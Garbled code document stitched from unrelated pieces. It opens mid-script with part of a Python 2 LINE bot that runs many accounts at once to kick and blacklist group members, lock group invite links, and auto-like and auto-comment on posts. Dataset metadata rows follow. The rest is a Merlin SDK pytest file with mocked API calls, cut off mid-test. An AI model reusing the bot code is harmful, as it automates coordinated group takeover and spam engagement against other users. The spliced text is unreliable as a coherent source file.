ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki14.updateGroup(G)
else:
G = ki14.getGroup(op.param1)
ki14.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki14.updateGroup(G)
Ticket = ki14.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki18.updateGroup(G)
except:
pass
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki5.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[contact.mid for contact in cl.getGroup(op.param1).invitee])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open Kick finish-----#
#------invite Kick start------#
if op.type == 13:
if wait["inviteprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------invite Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
cl.sendText
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(0.30)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
# ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
# ki2.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
# ki3.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
# ki4.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
# ki5.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
# ki6.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autolike)
thread1.daemon = True
thread1.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
| 49.487305
| 368
| 0.439131
| 22,234
| 263,124
| 5.277728
| 0.051003
| 0.03592
| 0.206212
| 0.239652
| 0.845993
| 0.810473
| 0.787328
| 0.761635
| 0.729072
| 0.714014
| 0.000049
| 0.029175
| 0.432176
| 263,124
| 5,316
| 369
| 49.496614
| 0.742216
| 0.054947
| 0
| 0.749331
| 0
| 0.001442
| 0.086264
| 0.004833
| 0.000412
| 0
| 0
| 0
| 0
| 0
| null | null | 0.014212
| 0.001236
| null | null | 0.014006
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b3c3b0b91b1de9c5219ee8eff2552fa963637f23
| 35,479
|
py
|
Python
|
python/sdk/test/model_test.py
|
ashwinath/merlin
|
087a7fa6fb21e4c771d64418bd58873175226ca1
|
[
"Apache-2.0"
] | null | null | null |
python/sdk/test/model_test.py
|
ashwinath/merlin
|
087a7fa6fb21e4c771d64418bd58873175226ca1
|
[
"Apache-2.0"
] | null | null | null |
python/sdk/test/model_test.py
|
ashwinath/merlin
|
087a7fa6fb21e4c771d64418bd58873175226ca1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Merlin Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import types
import pytest
from merlin.model import ModelType
from urllib3_mock import Responses
from unittest.mock import patch
import client as cl
from merlin.batch.config import PredictionJobConfig, ResultType
from merlin.batch.job import JobStatus
from merlin.batch.sink import BigQuerySink, SaveMode
from merlin.batch.source import BigQuerySource
from merlin.endpoint import VersionEndpoint
responses = Responses('requests.packages.urllib3')
default_resource_request = cl.ResourceRequest(1, 1, "100m", "128Mi")
env_1 = cl.Environment(1, "dev", "cluster-1", True, default_resource_request=default_resource_request)
env_2 = cl.Environment(2, "dev-2", "cluster-2", False, default_resource_request=default_resource_request)
ep1 = cl.VersionEndpoint("1234", 1, "running", "localhost/1", "svc-1",
env_1.name, env_1, "grafana.com")
ep2 = cl.VersionEndpoint("4567", 1, "running", "localhost/1", "svc-2",
env_2.name, env_2, "grafana.com")
rule_1 = cl.ModelEndpointRule(destinations=[cl.ModelEndpointRuleDestination(
ep1.id, weight=100)])
rule_2 = cl.ModelEndpointRule(destinations=[cl.ModelEndpointRuleDestination(
ep2.id, weight=100)])
mdl_endpoint_1 = cl.ModelEndpoint(1, 1, None, "serving", "localhost/1", rule_1,
env_1.name, env_1)
mdl_endpoint_2 = cl.ModelEndpoint(2, 1, None, "serving", "localhost/2", rule_2,
env_2.name, env_2)
config = {
"job_config": {
"version": "v1",
"kind": "PredictionJob",
"name": "job-1",
"bigquery_source": {
"table": "project.dataset.source_table",
"features": [
"feature_1",
"feature_2"
],
"options": {
"key": "val",
}
},
"model": {
"type": "PYFUNC_V2",
"uri": "gs://my-model/model",
"result": {
"type": "DOUBLE"
},
"options": {
"key": "val",
}
},
"bigquery_sink": {
"table": "project.dataset.result_table",
"staging_bucket": "gs://test",
"result_column": "prediction",
"save_mode": "OVERWRITE",
"options": {
"key": "val",
}
}
},
"image_ref": "asia.gcr.io/my-image:1",
"service_account_name": "my-service-account",
"resource_request": {
"driver_cpu_request": "1",
"driver_memory_request": "1Gi",
"executor_cpu_request": "1",
"executor_memory_request": "1Gi",
"executor_replica": 1
}
}
job_1 = cl.PredictionJob(id=1, name="job-1", version_id=1, model_id=1, config=config, status="pending", error="",
created_at="2019-08-29T08:13:12.377Z",
updated_at="2019-08-29T08:13:12.377Z")
job_2 = cl.PredictionJob(id=2, name="job-2", version_id=1, model_id=1, config=config, status="pending", error="error",
created_at="2019-08-29T08:13:12.377Z",
updated_at="2019-08-29T08:13:12.377Z")
class TestProject:
secret_1 = cl.Secret(id=1, name="secret-1", data="secret-data-1")
secret_2 = cl.Secret(id=2, name="secret-2", data="secret-data-2")
@responses.activate
def test_create_secret(self, project):
responses.add("POST", '/v1/projects/1/secrets',
body=json.dumps(self.secret_1.to_dict()),
status=200,
content_type='application/json')
project.create_secret(self.secret_1.name, self.secret_1.data)
actual_body = json.loads(responses.calls[0].request.body)
assert actual_body["name"] == self.secret_1.name
assert actual_body["data"] == self.secret_1.data
@responses.activate
def test_update_secret(self, project):
responses.add("GET", '/v1/projects/1/secrets',
body=json.dumps([self.secret_1.to_dict(), self.secret_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("PATCH", '/v1/projects/1/secrets/1',
body=json.dumps(self.secret_1.to_dict()),
status=200,
content_type='application/json')
project.update_secret(self.secret_1.name, "new-data")
actual_body = json.loads(responses.calls[1].request.body)
assert actual_body["name"] == self.secret_1.name
assert actual_body["data"] == "new-data"
responses.reset()
# test secret not found
responses.add("GET", '/v1/projects/1/secrets',
body=json.dumps([self.secret_1.to_dict()]),
status=200,
content_type='application/json')
with pytest.raises(ValueError, match=f"unable to find secret {self.secret_2.name} in project {project.name}"):
project.update_secret(self.secret_2.name, "new-data")
@responses.activate
def test_delete_secret(self, project):
responses.add("GET", '/v1/projects/1/secrets',
body=json.dumps([self.secret_1.to_dict(), self.secret_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("DELETE", '/v1/projects/1/secrets/1',
status=204,
content_type='application/json')
project.delete_secret(self.secret_1.name)
responses.reset()
# test secret not found
responses.add("GET", '/v1/projects/1/secrets',
body=json.dumps([self.secret_1.to_dict()]),
status=200,
content_type='application/json')
with pytest.raises(ValueError, match=f"unable to find secret {self.secret_2.name} in project {project.name}"):
project.delete_secret(self.secret_2.name)
@responses.activate
def test_list_secret(self, project):
responses.add("GET", '/v1/projects/1/secrets',
body=json.dumps([self.secret_1.to_dict(), self.secret_2.to_dict()]),
status=200,
content_type='application/json')
secret_names = project.list_secret()
assert secret_names == [self.secret_1.name, self.secret_2.name]
class TestModelVersion:
@responses.activate
def test_endpoint(self, version):
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep2.to_dict()]),
status=200,
content_type='application/json')
ep = version.endpoint
assert ep is None
responses.reset()
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
status=200,
content_type='application/json')
ep = version.endpoint
assert ep.id == ep1.id
assert ep.status.value == ep1.status
assert ep.environment_name == ep1.environment_name
assert ep.url.startswith(ep1.url)
@responses.activate
def test_list_endpoint(self, version):
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
status=200,
content_type='application/json')
endpoints = version.list_endpoint()
assert len(endpoints) == 2
assert endpoints[0].id == ep1.id
assert endpoints[1].id == ep2.id
@responses.activate
def test_deploy(self, version):
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/versions/1/endpoint',
body=json.dumps(ep1.to_dict()),
status=200,
content_type='application/json')
endpoint = version.deploy(environment_name=env_1.name)
assert endpoint.id == ep1.id
assert endpoint.status.value == ep1.status
assert endpoint.environment_name == ep1.environment_name
assert endpoint.environment.cluster == env_1.cluster
assert endpoint.environment.name == env_1.name
@responses.activate
def test_deploy_default_env(self, version):
# no default environment
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_2.to_dict()]),
status=200,
content_type='application/json')
with pytest.raises(ValueError):
version.deploy()
# default environment exists
responses.reset()
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/versions/1/endpoint',
body=json.dumps(ep1.to_dict()),
status=200,
content_type='application/json')
endpoint = version.deploy()
assert endpoint.id == ep1.id
assert endpoint.status.value == ep1.status
assert endpoint.environment_name == ep1.environment_name
assert endpoint.environment.cluster == env_1.cluster
assert endpoint.environment.name == env_1.name
@responses.activate
def test_undeploy(self, version):
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep2.to_dict()]),
status=200,
content_type='application/json')
version.undeploy(environment_name=env_1.name)
assert len(responses.calls) == 1
responses.reset()
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
status=200,
content_type='application/json')
responses.add("DELETE", '/v1/models/1/versions/1/endpoint/1234',
body=json.dumps(ep1.to_dict()),
status=200,
content_type='application/json')
version.undeploy(environment_name=env_1.name)
assert len(responses.calls) == 2
@responses.activate
def test_undeploy_default_env(self, version):
# no default environment
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_2.to_dict()]),
status=200,
content_type='application/json')
with pytest.raises(ValueError):
version.deploy()
responses.reset()
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep2.to_dict()]),
status=200,
content_type='application/json')
version.undeploy()
assert len(responses.calls) == 2
responses.reset()
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/versions/1/endpoint',
body=json.dumps([ep1.to_dict(), ep2.to_dict()]),
status=200,
content_type='application/json')
responses.add("DELETE", '/v1/models/1/versions/1/endpoint/1234',
body=json.dumps(ep1.to_dict()),
status=200,
content_type='application/json')
version.undeploy()
assert len(responses.calls) == 3
@responses.activate
def test_list_prediction_job(self, version):
responses.add(method="GET", url='/v1/models/1/versions/1/jobs',
body=json.dumps([job_1.to_dict(), job_2.to_dict()]),
status=200,
content_type='application/json')
jobs = version.list_prediction_job()
assert len(jobs) == 2
assert jobs[0].id == job_1.id
assert jobs[0].name == job_1.name
assert jobs[0].status == JobStatus(job_1.status)
assert jobs[0].error == job_1.error
assert jobs[1].id == job_2.id
assert jobs[1].name == job_2.name
assert jobs[1].status == JobStatus(job_2.status)
assert jobs[1].error == job_2.error
@responses.activate
def test_create_prediction_job(self, version):
job_1.status = "completed"
responses.add("POST", '/v1/models/1/versions/1/jobs',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
bq_src = BigQuerySource(table="project.dataset.source_table",
features=["feature_1", "feature2"],
options={"key": "val"})
bq_sink = BigQuerySink(table="project.dataset.result_table",
result_column="prediction",
save_mode=SaveMode.OVERWRITE,
staging_bucket="gs://test",
options={"key": "val"})
job_config = PredictionJobConfig(source=bq_src,
sink=bq_sink,
service_account_name="my-service-account",
result_type=ResultType.INTEGER)
j = version.create_prediction_job(job_config=job_config)
assert j.status == JobStatus.COMPLETED
assert j.id == job_1.id
assert j.error == job_1.error
assert j.name == job_1.name
actual_req = json.loads(responses.calls[0].request.body)
assert actual_req["config"]["job_config"]["bigquery_source"] == bq_src.to_dict()
assert actual_req["config"]["job_config"]["bigquery_sink"] == bq_sink.to_dict()
assert actual_req["config"]["job_config"]["model"]["result"]["type"] == ResultType.INTEGER.value
assert actual_req["config"]["job_config"]["model"]["uri"] == f"{version.artifact_uri}/model"
assert actual_req["config"]["job_config"]["model"]["type"] == ModelType.PYFUNC_V2.value.upper()
assert actual_req["config"]["service_account_name"] == "my-service-account"
@patch("merlin.model.DEFAULT_PREDICTION_JOB_DELAY", 0)
@patch("merlin.model.DEFAULT_PREDICTION_JOB_RETRY_DELAY", 0)
@responses.activate
def test_create_prediction_job_with_retry_failed(self, version):
job_1.status = "pending"
responses.add("POST", '/v1/models/1/versions/1/jobs',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
for i in range(5):
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=500,
content_type='application/json')
bq_src = BigQuerySource(table="project.dataset.source_table",
features=["feature_1", "feature2"],
options={"key": "val"})
bq_sink = BigQuerySink(table="project.dataset.result_table",
result_column="prediction",
save_mode=SaveMode.OVERWRITE,
staging_bucket="gs://test",
options={"key": "val"})
job_config = PredictionJobConfig(source=bq_src,
sink=bq_sink,
service_account_name="my-service-account",
result_type=ResultType.INTEGER)
with pytest.raises(ValueError):
j = version.create_prediction_job(job_config=job_config)
assert j.id == job_1.id
assert j.error == job_1.error
assert j.name == job_1.name
assert len(responses.calls) == 6
@patch("merlin.model.DEFAULT_PREDICTION_JOB_DELAY", 0)
@patch("merlin.model.DEFAULT_PREDICTION_JOB_RETRY_DELAY", 0)
@responses.activate
def test_create_prediction_job_with_retry_success(self, version):
job_1.status = "pending"
responses.add("POST", '/v1/models/1/versions/1/jobs',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
# Patch the method as currently it is not supported in the library
# https://github.com/getsentry/responses/issues/135
def _find_match(self, request):
for match in self._urls:
if request.method == match['method'] and \
self._has_url_match(match, request.url):
return match
def _find_match_patched(self, request):
for index, match in enumerate(self._urls):
if request.method == match['method'] and \
self._has_url_match(match, request.url):
if request.method == "GET" and request.url == "/v1/models/1/versions/1/jobs/1":
return self._urls.pop(index)
else:
return match
responses._find_match = types.MethodType(_find_match_patched, responses)
for i in range(4):
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=500,
content_type='application/json')
job_1.status = "completed"
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
bq_src = BigQuerySource(table="project.dataset.source_table",
features=["feature_1", "feature2"],
options={"key": "val"})
bq_sink = BigQuerySink(table="project.dataset.result_table",
result_column="prediction",
save_mode=SaveMode.OVERWRITE,
staging_bucket="gs://test",
options={"key": "val"})
job_config = PredictionJobConfig(source=bq_src,
sink=bq_sink,
service_account_name="my-service-account",
result_type=ResultType.INTEGER)
j = version.create_prediction_job(job_config=job_config)
assert j.status == JobStatus.COMPLETED
assert j.id == job_1.id
assert j.error == job_1.error
assert j.name == job_1.name
actual_req = json.loads(responses.calls[0].request.body)
assert actual_req["config"]["job_config"]["bigquery_source"] == bq_src.to_dict()
assert actual_req["config"]["job_config"]["bigquery_sink"] == bq_sink.to_dict()
assert actual_req["config"]["job_config"]["model"]["result"]["type"] == ResultType.INTEGER.value
assert actual_req["config"]["job_config"]["model"]["uri"] == f"{version.artifact_uri}/model"
assert actual_req["config"]["job_config"]["model"]["type"] == ModelType.PYFUNC_V2.value.upper()
assert actual_req["config"]["service_account_name"] == "my-service-account"
assert len(responses.calls) == 6
# unpatch
responses._find_match = types.MethodType(_find_match, responses)
@patch("merlin.model.DEFAULT_PREDICTION_JOB_DELAY", 0)
@patch("merlin.model.DEFAULT_PREDICTION_JOB_RETRY_DELAY", 0)
@responses.activate
def test_create_prediction_job_with_retry_pending_then_failed(self, version):
job_1.status = "pending"
responses.add("POST", '/v1/models/1/versions/1/jobs',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
# Patch the method as currently it is not supported in the library
# https://github.com/getsentry/responses/issues/135
def _find_match(self, request):
for match in self._urls:
if request.method == match['method'] and \
self._has_url_match(match, request.url):
return match
def _find_match_patched(self, request):
for index, match in enumerate(self._urls):
if request.method == match['method'] and \
self._has_url_match(match, request.url):
if request.method == "GET" and request.url == "/v1/models/1/versions/1/jobs/1":
return self._urls.pop(index)
else:
return match
responses._find_match = types.MethodType(_find_match_patched, responses)
for i in range(3):
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=500,
content_type='application/json')
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
job_1.status = "failed"
for i in range(5):
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=500,
content_type='application/json')
bq_src = BigQuerySource(table="project.dataset.source_table",
features=["feature_1", "feature2"],
options={"key": "val"})
bq_sink = BigQuerySink(table="project.dataset.result_table",
result_column="prediction",
save_mode=SaveMode.OVERWRITE,
staging_bucket="gs://test",
options={"key": "val"})
job_config = PredictionJobConfig(source=bq_src,
sink=bq_sink,
service_account_name="my-service-account",
result_type=ResultType.INTEGER)
with pytest.raises(ValueError):
j = version.create_prediction_job(job_config=job_config)
assert j.id == job_1.id
assert j.error == job_1.error
assert j.name == job_1.name
# unpatch
responses._find_match = types.MethodType(_find_match, responses)
assert len(responses.calls) == 10
@responses.activate
def test_stop_prediction_job(self, version):
job_1.status = "pending"
responses.add("POST", '/v1/models/1/versions/1/jobs',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
responses.add("PUT", '/v1/models/1/versions/1/jobs/1/stop',
status=204,
content_type='application/json')
job_1.status = "terminated"
responses.add("GET", '/v1/models/1/versions/1/jobs/1',
body=json.dumps(job_1.to_dict()),
status=200,
content_type='application/json')
bq_src = BigQuerySource(table="project.dataset.source_table",
features=["feature_1", "feature2"],
options={"key": "val"})
bq_sink = BigQuerySink(table="project.dataset.result_table",
result_column="prediction",
save_mode=SaveMode.OVERWRITE,
staging_bucket="gs://test",
options={"key": "val"})
job_config = PredictionJobConfig(source=bq_src,
sink=bq_sink,
service_account_name="my-service-account",
result_type=ResultType.INTEGER)
j = version.create_prediction_job(job_config=job_config, sync=False)
j = j.stop()
assert j.status == JobStatus.TERMINATED
assert j.id == job_1.id
assert j.error == job_1.error
assert j.name == job_1.name
class TestModel:
v1 = cl.Version(id=1, model_id=1)
v2 = cl.Version(id=2, model_id=1)
@responses.activate
def test_list_version(self, model):
responses.add("GET", "/v1/models/1/versions?limit=50&cursor=&search=",
match_querystring=True,
body=json.dumps([self.v1.to_dict()]),
status=200,
adding_headers={"Next-Cursor": "abcdef"},
content_type='application/json')
responses.add("GET", "/v1/models/1/versions?limit=50&cursor=abcdef&search=",
match_querystring=True,
body=json.dumps([self.v2.to_dict()]),
status=200,
content_type='application/json')
versions = model.list_version()
assert len(versions) == 2
assert versions[0].id == 1
assert versions[1].id == 2
@responses.activate
def test_list_endpoint(self, model):
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[mdl_endpoint_1.to_dict(),
mdl_endpoint_2.to_dict()]),
status=200,
content_type='application/json')
endpoints = model.list_endpoint()
assert len(endpoints) == 2
assert endpoints[0].id == str(mdl_endpoint_1.id)
assert endpoints[1].id == str(mdl_endpoint_2.id)
v = model.get_version(1)
assert v.id == 1
assert model.get_version(3) is None
@responses.activate
def test_list_endpoint(self, model):
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[mdl_endpoint_1.to_dict(),
mdl_endpoint_2.to_dict()]),
status=200,
content_type='application/json')
endpoints = model.list_endpoint()
assert len(endpoints) == 2
assert endpoints[0].id == str(mdl_endpoint_1.id)
assert endpoints[1].id == str(mdl_endpoint_2.id)
@responses.activate
def test_serve_traffic(self, model):
ve = VersionEndpoint(ep1)
with pytest.raises(ValueError):
model.serve_traffic([ve], environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: -1}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: 101}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({VersionEndpoint(ep2): 100},
environment_name=env_1.name)
# test create
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/endpoints',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100}, environment_name=env_1.name)
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
responses.reset()
# test update
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps([mdl_endpoint_1.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
responses.add("PUT", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100}, environment_name=env_1.name)
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
@responses.activate
def test_stop_serving_traffic(self, model):
ve = VersionEndpoint(ep1)
with pytest.raises(ValueError):
model.serve_traffic([ve], environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: -1}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({ve: 101}, environment_name=env_1.name)
with pytest.raises(ValueError):
model.serve_traffic({VersionEndpoint(ep2): 100},
environment_name=env_1.name)
# test create
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/endpoints',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100}, environment_name=env_1.name)
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
responses.reset()
# test DELETE
responses.reset()
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps([mdl_endpoint_1.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints/1',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
responses.add("DELETE", '/v1/models/1/endpoints/1',
status=200,
content_type='application/json')
model.stop_serving_traffic(endpoint.environment_name)
assert len(responses.calls) == 2
@responses.activate
def test_serve_traffic_default_env(self, model):
ve = VersionEndpoint(ep1)
# no default environment
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_2.to_dict()]),
status=200,
content_type='application/json')
with pytest.raises(ValueError):
model.serve_traffic({ve: 100})
responses.reset()
# test create
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps(
[]),
status=200,
content_type='application/json')
responses.add("POST", '/v1/models/1/endpoints',
body=json.dumps(mdl_endpoint_1.to_dict()),
status=200,
content_type='application/json')
endpoint = model.serve_traffic({ve: 100})
assert endpoint.id == str(mdl_endpoint_1.id)
assert endpoint.environment_name == env_1.name == mdl_endpoint_1.environment_name
responses.reset()
# test update
responses.add("GET", '/v1/environments',
body=json.dumps(
[env_1.to_dict(), env_2.to_dict()]),
status=200,
content_type='application/json')
responses.add("GET", '/v1/models/1/endpoints',
body=json.dumps([mdl_endpoint_1.to_dict()]),
status=200,
